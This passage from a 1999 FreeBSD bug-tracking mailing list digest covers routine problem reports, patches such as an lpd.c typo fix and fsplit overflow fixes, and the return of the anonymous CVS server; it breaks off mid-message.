owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: userland ppp dialup fail with AtermIT State-Changed-From-To: open->closed State-Changed-By: brian State-Changed-When: Mon Dec 20 14:45:05 PST 1999 State-Changed-Why: The fix mentioned is the correct fix (a configuration change). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 15:20:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E91AB153B5 for ; Mon, 20 Dec 1999 15:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA74215; Mon, 20 Dec 1999 15:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 20 Dec 1999 15:20:03 -0800 (PST) Message-Id: <199912202320.PAA74215@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Juergen Lock Subject: Re: kern/15532: Reboot just to kill a print job? Reply-To: Juergen Lock Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15532; it has been noted by GNATS. From: Juergen Lock To: Alexander Langer Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: kern/15532: Reboot just to kill a print job? Date: Mon, 20 Dec 1999 23:33:55 +0100 On Sun, Dec 19, 1999 at 12:11:55PM +0100, Alexander Langer wrote: > Also sprach Juergen Lock (nox@jelal.kn-bremen.de): > > > > > old :), killed the job and powecycled the printer (there's no other > > > > way to reset it i believe), but when i then sent the job again the > > > > printer only got garbage. so i had to hit offline again... > > > Yes, that happens to me every time I get those problems. > > Sounds like you get paper jam often? (What printer is that?) > > HP Laserjet 4, but I sometimes use print to both pages, and if the > page has been printed already ones paper jams occur often. > It's the bad paper that makes these appear. > Ooh. Yes, feeding a laserprinter/photocopier its pages again to print on the other side often ends with paper jam. Somtimes waiting a while before the second pass helps if you do have to do this, to let the paper cool down... > > > Also try booting the machine while the printer prints. The same > > > result. > > Oh. even if you reset the printer too? > > Can't remember. > If that Laserjet 4 is the same/similar model than the one we have at work then reset is a two-button combination, no need to powercycle. Regards, -- Juergen Lock (remove dot foo from address to reply) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 17:50: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E2752151D0 for ; Mon, 20 Dec 1999 17:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA89426; Mon, 20 Dec 1999 17:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 3658E15271; Mon, 20 Dec 1999 17:48:50 -0800 (PST) Message-Id: <19991221014850.3658E15271@hub.freebsd.org> Date: Mon, 20 Dec 1999 17:48:50 -0800 (PST) From: riccardo@torrini.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/15596: netstat -rn does'n fit on a 80 chars wide terminal Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15596 >Category: bin >Synopsis: netstat -rn does'n fit on a 80 chars wide terminal >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 17:50:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Riccardo Torrini >Release: 4.0-CURRENT, last make on 1999.12.19 >Organization: >Environment: FreeBSD trudy.home.torrini.org 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Tue Dec 21 01:59:57 CET 1999 root@trudy.home.torrini.org:/usr/src/sys/compile/TRUDY i386 >Description: netstat -r works fine but netstat -rn (show only ip without resolving names) does'n fit on a 80 chars wide terminal (console nor xterm) >How-To-Repeat: just try netstat -rn from a command line (also netstat -r) to show differences >Fix: netstat -rn | cut -c-16,32- # :-) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 18:11:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6C72515077 for ; Mon, 20 Dec 1999 18:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA92041; Mon, 20 Dec 1999 18:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 20 Dec 1999 18:10:02 -0800 (PST) Message-Id: <199912210210.SAA92041@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Chris Costello Subject: Re: bin/15596: netstat -rn does'n fit on a 80 chars wide terminal Reply-To: Chris Costello Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15596; it has been noted by GNATS. From: Chris Costello To: riccardo@torrini.org Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: bin/15596: netstat -rn does'n fit on a 80 chars wide terminal Date: Mon, 20 Dec 1999 20:02:47 -0600 On Mon, Dec 20, 1999, riccardo@torrini.org wrote: > netstat -r works fine but netstat -rn (show only ip without resolving > names) does'n fit on a 80 chars wide terminal (console nor xterm) No, netstat -rn prints the routing tables. Perhaps you could provide an example of what specifically is happening. -- |Chris Costello |I must have slipped a disk; my pack hurts. `------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 22:50: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E7F715237 for ; Mon, 20 Dec 1999 22:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA15038; Mon, 20 Dec 1999 22:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 2F305153CC; Mon, 20 Dec 1999 22:47:26 -0800 (PST) Message-Id: <19991221064726.2F305153CC@hub.freebsd.org> Date: Mon, 20 Dec 1999 22:47:26 -0800 (PST) From: lx@hellstunas.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15601: Selecting 'custom distribution' causes signal 11 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15601 >Category: misc >Synopsis: Selecting 'custom distribution' causes signal 11 >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 22:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: David Thiel >Release: 3.4 Release >Organization: US Geological Survey >Environment: can't do that... >Description: When I boot 3.4-Release off of floppy, I do an Expert Install. After doing partitioning and disklabeling, I choose to install a custom distribution. When I hit space, I get an error box telling me that it caught a signal 11. When debugging is turned on, it reports: DEBUG: Executing command '/stand/gunzip < /stand/help/distributions.hlp.gz > /tmp/.doc/doc.tmp' DEBUG: Command (the command in the previous debug message) returns status of 0 DEBUG: Signal 11 caught! That's bad! >How-To-Repeat: Instructions above. >Fix: No clue. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 2:56:12 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DF90D154AA; Tue, 21 Dec 1999 02:56:03 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA39111; Tue, 21 Dec 1999 02:56:03 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 02:56:03 -0800 (PST) From: Message-Id: <199912211056.CAA39111@freefall.freebsd.org> To: olli@graal.camelot.de, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/7665: sysinstall quits silently Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sysinstall quits silently State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Tue Dec 21 02:54:57 PST 1999 State-Changed-Why: `od' driver is retired from the kernel. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 3:21:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E182915400; Tue, 21 Dec 1999 03:21:12 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA41590; Tue, 21 Dec 1999 03:21:12 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 03:21:12 -0800 (PST) From: Message-Id: <199912211121.DAA41590@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: conf/7354: source distribution selection bug when installing Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: source distribution selection bug when installing Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 03:19:40 PST 1999 Responsible-Changed-Why: Over to sysinstall maintainer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 3:23:27 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BE40C14A2B; Tue, 21 Dec 1999 03:23:26 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA41899; Tue, 21 Dec 1999 03:23:26 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 03:23:26 -0800 (PST) From: Message-Id: <199912211123.DAA41899@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: conf/7823: sysinstall will not install XFree Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sysinstall will not install XFree Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 03:21:50 PST 1999 Responsible-Changed-Why: Over to sysinstall maintainer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 3:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D20111540D for ; Tue, 21 Dec 1999 03:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA43819; Tue, 21 Dec 1999 03:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from secom-sis.co.jp (spiral.secom-sis.co.jp [202.218.246.72]) by hub.freebsd.org (Postfix) with ESMTP id 1A5F3152B0 for ; Tue, 21 Dec 1999 03:31:22 -0800 (PST) (envelope-from tetsuya@secom-sis.co.jp) Received: by spiral.secom-sis.co.jp id <27780>; Tue, 21 Dec 1999 20:24:07 +0900 Message-Id: <99Dec21.202407jst.27780@spiral.secom-sis.co.jp> Date: Tue, 21 Dec 1999 20:31:15 +0900 From: tetsuya@secom-sis.co.jp Reply-To: tetsuya@secom-sis.co.jp To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: bin/15604: Typo in lpd.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15604 >Category: bin >Synopsis: Typo in lpd.c >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 03:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Tetsuya Furukawa >Release: FreeBSD 3.4-RELEASE i386 >Organization: None >Environment: None. >Description: It's a long-life bug since the initial revision. It doesn't seem to have any ill effect in the current source code. >How-To-Repeat: None. >Fix: --- usr.sbin/lpr/lpd/lpd.c.orig Mon Aug 30 00:43:22 1999 +++ usr.sbin/lpr/lpd/lpd.c Tue Dec 21 19:58:07 1999 @@ -590,7 +590,7 @@ inet_ntoa(f->sin_addr)); (void) strncpy(fromb, hp->h_name, sizeof(fromb) - 1); - from[sizeof(fromb) - 1] = '\0'; + fromb[sizeof(fromb) - 1] = '\0'; from = fromb; /* Check for spoof, ala rlogind */ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 3:45:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2D306152B0; Tue, 21 Dec 1999 03:45:41 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA44334; Tue, 21 Dec 1999 03:45:41 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 03:45:41 -0800 (PST) From: Message-Id: <199912211145.DAA44334@freefall.freebsd.org> To: andyf@speednet.com.au, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, sheldonh@FreeBSD.org Subject: Re: misc/15066: ``allscreens_flags'' in rc.conf not documented; produces unexpected results Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ``allscreens_flags'' in rc.conf not documented; produces unexpected results State-Changed-From-To: open->suspended State-Changed-By: sheldonh State-Changed-When: Tue Dec 21 03:43:44 PST 1999 State-Changed-Why: Fixed in CURRENT's rev 1.48 of rc.i386 and RELENG_3's rev 1.37.2.6 . I've documented the flag in CURRENT's rev 1.59 of rc.conf.5, but I'll wait a few days for objections before I MFC the change. Responsible-Changed-From-To: freebsd-bugs->sheldonh Responsible-Changed-By: sheldonh Responsible-Changed-When: Tue Dec 21 03:43:44 PST 1999 Responsible-Changed-Why: Reminder for me. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 3:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F0EEC1528B for ; Tue, 21 Dec 1999 03:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA44813; Tue, 21 Dec 1999 03:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Tue, 21 Dec 1999 03:50:02 -0800 (PST) Message-Id: <199912211150.DAA44813@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: bin/15471: fsplit buffer overflow fixes Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15471; it has been noted by GNATS. From: Sheldon Hearn To: "Steven G. Kargl" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15471: fsplit buffer overflow fixes Date: Tue, 21 Dec 1999 13:42:51 +0200 On Tue, 14 Dec 1999 11:06:41 PST, "Steven G. Kargl" wrote: > + extern int optind; > + extern char *optarg; > + I think these are declared in unistd.h, which you should always include for getopt(3). > + extrfnd = (int *) malloc(argc * sizeof(int)); > + if (extrfnd == NULL) > + errx(1, NULL); The style(9) way of doing this seems to be to put the malloc, assignment and evaluation in the if condition. The same applies to your fopen() later. If I were to commit with these minor deviations from your patch, would you be happy? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 4:32:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 34B3414DB3; Tue, 21 Dec 1999 04:32:07 -0800 (PST) (envelope-from dhagan@cowpie.acm.vt.edu) Received: (from dhagan@localhost) by cowpie.acm.vt.edu (8.9.3/8.9.3) id HAA15306; Tue, 21 Dec 1999 07:31:06 -0500 (EST) Date: Tue, 21 Dec 1999 07:31:05 -0500 (EST) From: Daniel Hagan To: bugs@freebsd.org Cc: jdp@polstra.com, jhb@freebsd.org Subject: misc/15521 - FreeBSD Anonymous CVS server is back in operation Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The PR I filed should probably be updated to a doc bug now that anoncvs is fixed. The handbook article should be updated to reflect the new instructions. Daniel -- Daniel Hagan http://www.acm.vt.edu/~dhagan/ Head Admin dhagan@acm.vt.edu PGP 2.6.2 encouraged ACM at VT "The world is coming to an end. Please log off." ---------- Forwarded message ---------- Date: Mon, 20 Dec 1999 18:28:56 -0800 (PST) From: John Polstra To: freebsd-announce@FreeBSD.ORG Subject: FreeBSD Anonymous CVS server is back in operation The FreeBSD anonymous CVS server "anoncvs.freebsd.org" is back in service now. Usage has changed slightly. In particular, you'll need to set your CVSROOT environment variable to ":pserver:anoncvs@anoncvs.freebsd.org:/home/ncvs" and use "cvs login" with the password "anoncvs" to gain initial access. See http://www.freebsd.org/handbook/synching.html#ANONCVS for details. John Polstra FreeBSD Source Tree Distributionmeister To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 4:52:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 848B914DD5; Tue, 21 Dec 1999 04:52:28 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA52103; Tue, 21 Dec 1999 04:52:28 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Tue, 21 Dec 1999 04:52:28 -0800 (PST) From: Message-Id: <199912211252.EAA52103@freefall.freebsd.org> To: timlee@netcom.com, jedgar@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15411: anoncvs does not work: /ctm/FreeBSD/anoncvs/anoncvssh: No such file or directory Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: anoncvs does not work: /ctm/FreeBSD/anoncvs/anoncvssh: No such file or directory State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Tue Dec 21 04:52:01 PST 1999 State-Changed-Why: anoncvs.freebsd.org is back, but now uses 'pserver' authentication. Handbook updated (Revision 1.34) to reflect this. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 4:54:33 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DE4F414DF8; Tue, 21 Dec 1999 04:54:32 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA52356; Tue, 21 Dec 1999 04:54:32 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Tue, 21 Dec 1999 04:54:32 -0800 (PST) From: Message-Id: <199912211254.EAA52356@freefall.freebsd.org> To: dhagan@cs.vt.edu, jedgar@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/15521: anoncvs.freebsd.org doesn't work per http://www.freebsd.org/handbook/synching.html#ANONCVS Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: anoncvs.freebsd.org doesn't work per http://www.freebsd.org/handbook/synching.html#ANONCVS State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Tue Dec 21 04:54:09 PST 1999 State-Changed-Why: anoncvs.freebsd.org is back, but now uses 'pserver' authentication. Handbook updated (Revision 1.34) to reflect this. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 4:58:36 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 025DA15063; Tue, 21 Dec 1999 04:58:35 -0800 (PST) (envelope-from cdf.lists@fxp.org) Received: by pawn.primelocation.net (Postfix, from userid 1016) id EF1139B4A; Tue, 21 Dec 1999 07:58:33 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by pawn.primelocation.net (Postfix) with ESMTP id E3BA9BA0C; Tue, 21 Dec 1999 07:58:33 -0500 (EST) Date: Tue, 21 Dec 1999 07:58:33 -0500 (EST) From: "Chris D. Faulhaber" X-Sender: cdf.lists@pawn.primelocation.net To: Daniel Hagan Cc: bugs@freebsd.org, jdp@polstra.com, jhb@freebsd.org Subject: Re: misc/15521 - FreeBSD Anonymous CVS server is back in operation In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 21 Dec 1999, Daniel Hagan wrote: > The PR I filed should probably be updated to a doc bug now that anoncvs is > fixed. The handbook article should be updated to reflect the new > instructions. > The handbook was updated yesterday to reflect this and should be on the website today: jdp 1999/12/20 15:58:38 PST Modified files: en_US.ISO_8859-1/books/handbook/cutting-edge chapter.sgml Log: Anoncvs.freebsd.org is back, but now it uses "pserver" authentication. Update the documentation to reflect the new procedure for using it. ----- Chris D. Faulhaber - jedgar@fxp.org - jedgar@freebsd.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 5:32:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E49EC14A04; Tue, 21 Dec 1999 05:32:15 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA56040; Tue, 21 Dec 1999 05:32:15 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 05:32:15 -0800 (PST) From: Message-Id: <199912211332.FAA56040@freefall.freebsd.org> To: sheldonh@FreeBSD.org, wollman@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/2258: route add/delete [network] xxx.yyy.zzz.0 my-IP Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: route add/delete [network] xxx.yyy.zzz.0 my-IP Responsible-Changed-From-To: wollman->freebsd-bugs Responsible-Changed-By: sheldonh Responsible-Changed-When: Tue Dec 21 05:31:10 PST 1999 Responsible-Changed-Why: Garrett can't use the PR system, Adrian has a handle on the thing and it'll _never_ get closed as it is. Expect feedback from the Originator some time soon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 5:32:44 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8ACDD14F70; Tue, 21 Dec 1999 05:32:43 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA56163; Tue, 21 Dec 1999 05:32:43 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 05:32:43 -0800 (PST) From: Message-Id: <199912211332.FAA56163@freefall.freebsd.org> To: sheldonh@FreeBSD.org, wollman@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/8623: [MFC] Time zone for Japan is strange (seen in /stand/sysinstall) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [MFC] Time zone for Japan is strange (seen in /stand/sysinstall) Responsible-Changed-From-To: wollman->freebsd-bugs Responsible-Changed-By: sheldonh Responsible-Changed-When: Tue Dec 21 05:32:17 PST 1999 Responsible-Changed-Why: This vendor branch MFC is up for grabs to the brave. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 6:10: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7699F15466 for ; Tue, 21 Dec 1999 06:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA59688; Tue, 21 Dec 1999 06:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from prserv.net (out1.prserv.net [165.87.194.252]) by hub.freebsd.org (Postfix) with ESMTP id 441BF14FCA for ; Tue, 21 Dec 1999 06:09:09 -0800 (PST) (envelope-from placej@ibm.net) Received: from ibm.net. ([166.72.224.72]) by prserv.net (out1) with ESMTP id <1999122114090625203cb021e>; Tue, 21 Dec 1999 14:09:07 +0000 Received: (from placej@localhost) by ibm.net. (8.9.3/8.9.2) id JAA01943; Tue, 21 Dec 1999 09:09:04 -0500 (EST) (envelope-from placej) Message-Id: <199912211409.JAA01943@ibm.net.> Date: Tue, 21 Dec 1999 09:09:04 -0500 (EST) From: jcplace@attglobal.net Reply-To: jcplace@attglobal.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15606: sysinstall dumps core when trying display distributions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15606 >Category: bin >Synopsis: sysinstall dumps core when trying display distributions >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 06:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: John Place >Release: FreeBSD 3.4-RELEASE i386 >Organization: >Environment: P5 133Mhz 24MB Ram >Description: sysinstall dumps core when trying to display distributions. This happens both durring install (custom option) or on a running system. >How-To-Repeat: as root start sysinstall pick Configure pick Distribution (Core Dump) Or: boot up install floppy when it prompts you to select distributions select Custom (Core Dump) I have turned on the Debug option and it shows no information. It seems that any call that displays the function returns garbage. >Fix: I have not found a work around yet I simply do not use the custom install and rarely do I use it after install. A word of warning I installed this box by downloading /bin /manpages and installing a "basic system". I have done this may time without a hitch. The install had no other errors. I have a core file if you want it (58k zipped) let me know. -John >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 6:27: 0 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F48315432; Tue, 21 Dec 1999 06:26:59 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA61486; Tue, 21 Dec 1999 06:26:59 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 06:26:59 -0800 (PST) From: Message-Id: <199912211426.GAA61486@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: bin/15606: sysinstall dumps core when trying display distributions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sysinstall dumps core when trying display distributions Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: 